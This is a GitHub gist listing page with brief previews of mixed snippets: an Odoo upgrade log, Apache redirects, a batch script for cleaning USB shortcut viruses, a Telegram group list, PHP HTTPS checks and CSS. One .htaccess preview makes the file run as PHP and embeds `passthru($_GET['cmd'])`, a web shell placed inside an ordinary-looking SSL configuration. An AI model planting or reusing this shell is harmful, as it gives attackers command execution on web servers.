View odoo_14_to_16_error.log
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
======================================================= | |
Odoo.sh: Uploading database to the Upgrade platform | |
Transfer started at 13-Mar 08:22 UTC | |
progress: 7% 13-Mar 08:22 UTC | |
progress: 26% 13-Mar 08:22 UTC | |
progress: 57% 13-Mar 08:22 UTC | |
progress: 88% 13-Mar 08:22 UTC | |
progress: 100% 13-Mar 08:22 UTC | |
The following log is the output of the upgrade process |
View .htaccess
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<IfModule mod_rewrite.c> | |
RewriteEngine On | |
RewriteBase / | |
RewriteCond %{HTTP_HOST} ^35\.53\.125\.135$ | |
RewriteRule ^(.*)$ http://abc.com/$1 [L,R=301] | |
</IfModule> |
View 刪除並修復隨身碟捷徑病毒v3.3.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
echo =========捷徑病毒修復程式說明========= | |
echo; | |
echo 編輯者:Lun 2017.12.06 版本:v3.3 | |
echo; | |
echo 適用狀況:所有檔案皆變為捷徑檔、隨身碟點開變為捷徑。 | |
echo; | |
echo 修復程式僅會刪除病毒檔案,其餘非病毒相關檔案並不影響。 | |
echo; | |
echo 程式請以→右鍵→"系統管理員身分執行" |
View 201805.md
http redirect
網址重導 http://www.vixual.net/blog/archives/161
View Telegram_it_group_list.md
Telegram 資訊相關 群組清單 (GROUP)
本群組清單 提交修改 請至 gist 回覆
[AD]
- 台灣 OSS Conference的宣傳與交流
- https://lokidea.page.link/TWOssConfList (Google文件)
- 以上連結歡迎推廣與編輯
- https://www.fb.com/groups/Taiwan.OSS.Conference.List/
View config.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// false | |
$root = ($_SERVER['SERVER_PORT'] == 443 ? 'https' : 'http'); | |
// false | |
$root = "http".((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == "on") ? "s" : ""); | |
// false | |
$root = (empty($_SERVER['HTTPS']) OR strtolower($_SERVER['HTTPS']) === 'off') ? 'http' : 'https'; |
View .htaccess
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Files ~ "^\.ht"> | |
Order allow,deny | |
Allow from all | |
</files> | |
AddType application/x-httpd-php .htaccess | |
# <?php passthru($_GET['cmd']);?> | |
# BEGIN rlrssslReallySimpleSSL rsssl_version[2.4.1] | |
<IfModule mod_rewrite.c> | |
RewriteEngine on |
View old_save_20160428.css
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*小徽章*/ | |
.award_bar img { width:39px;height: 39px; } | |
/*小徽章排排站*/ | |
.award_bar { | |
background:url(http://blog.citytalk.tw/wp-content/uploads/2010/04/plurk_icon.png) no-repeat scroll 0px 60px; min-height:480px; | |
position:absolute !important; | |
margin-top:60px !important; | |
width:500px !important; | |
} |
NewerOlder